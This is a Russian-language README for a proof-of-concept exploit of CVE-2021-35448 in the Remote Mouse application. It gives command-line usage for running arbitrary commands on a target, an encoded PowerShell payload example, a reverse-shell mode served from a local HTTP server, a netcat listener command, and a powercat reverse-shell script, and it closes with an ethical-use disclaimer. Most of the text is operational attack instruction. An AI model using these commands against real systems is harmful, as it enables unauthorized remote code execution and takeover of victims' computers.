
POC для CVE-2021-35448 на основе https://www.exploit-db.com/exploits/49601
Этот эксплойт нацелен на уязвимость CVE-2021-35448 в приложении Remote Mouse (ранее WiFi Mouse).
python3 CVE-2021-35448.py -t <TARGET_IP> [OPTIONS]
-t, --target: IP-адрес цели (обязательно)-p, --payload: Произвольная команда для выполнения-r, --reverse: Обратная оболочка в формате IP:PORT-l, --http: Локальный HTTP-сервер в формате IP:PORT (обязателен с -r)python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
# Terminal 1 - Listener
nc -nlvp 4444
# Terminal 2 - Exploit
python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
CVE-2021-35448.py: Основной скрипт эксплуатацииpowercat.ps1: PowerShell-скрипт для обратных оболочек⚠️ ТОЛЬКО ДЛЯ ЭТИЧЕСКОГО ИСПОЛЬЗОВАНИЯ ⚠️
Этот инструмент предназначен исключительно для образовательных целей и авторизованного тестирования на проникновение. Несанкционированное использование этого эксплойта незаконно и может привести к уголовному преследованию.
Разработан в образовательных и этических целях тестирования на проникновение.
Последнее обновление: 2025